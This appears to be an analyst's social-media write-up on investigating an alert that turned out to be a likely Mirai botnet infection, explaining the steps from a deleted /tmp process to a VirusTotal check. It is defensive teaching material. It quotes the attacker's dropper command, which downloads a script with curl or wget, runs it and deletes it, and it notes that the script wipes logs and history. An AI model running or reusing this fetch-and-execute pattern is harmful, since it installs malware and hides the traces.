Here's a little write-up on my investigation methodology when it comes to suspicious alerts. Might as well use the expanded character limit and maybe someone will find it helpful! Some details have been changed and some of this is specific to the platform I use but the flow is there.

This stemmed from a recently caught malware infection that may have been a Mirari botnet variant. Initial alert was a process running out of /tmp/ and here's how I went from "huh that's weird" to "huh that's probably malware".

The filename and the fact that it was deleted. It was an extremely weird filename (imagine a cat walking on a keyboard) that ended in .x86 and it was deleted but still running. It's common for malware to delete itself after execution but some legit programs do too and sometimes weird filenames are normal so I kept digging.

Working backwards from the process execution time I started filtering out unrelated activity such as connect() syscalls that the host normally made while also making note of some suspicious connect() syscalls. This eventually lead to a string that started with /bin/bash -c cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; curl $incredibly_suspicious_url/$filename.sh and continued on with a wget in case the curl failed and then continued with chmod 777 $filename.sh; sh $filename.sh; rm -rf $filename.sh; rm -rf $filename.sh.1. We commonly see this when something manages RCE through a vulnerable app or when someone passes commands via a popped SSH user. If you see bash -c (or sh -c) followed by moving around directories (|| means execute the statement which follows only if the preceding statement failed) then curl/wget and some execution that's quite suspicious especially if it's a single string. The alert was escalated by this point.

I then downloaded then shell script onto a sacrificial box and then took a look at it. It started off by nuking log directories which is a red flag, it also flushed iptables and nuked history before downloading a ton of executables that have extensions based on almost every imaginable architecture.

Finally I downloaded the executable that was run on the alerted system (the one ending in x86) and got the SHA256 hash (run sha256sum on Linux) and ran that through VirusTotal, got a bunch of hits that led me to believe it might be a Mirai variant. Depending on how much time I have I will sometimes run the executable and see what artifacts I get. I'm absolutely terrible at static analysis outside of running strings but I'm decent at dynamic analysis.

The suspicious connect() syscalls I mentioned were to a bunch of random IPs so it very well might have been the botnet attempting to spread. This one was pretty cut and dry, it wasn't really attempting to hide and when a shell script starts blowing away log files then something is up to no good. While I've found that no two analysts investigate something the same way hopefully this provided some insight into this version of investigation methodology.

#AlertInvestigation #InvestigationMethodology #MalwareInvestigation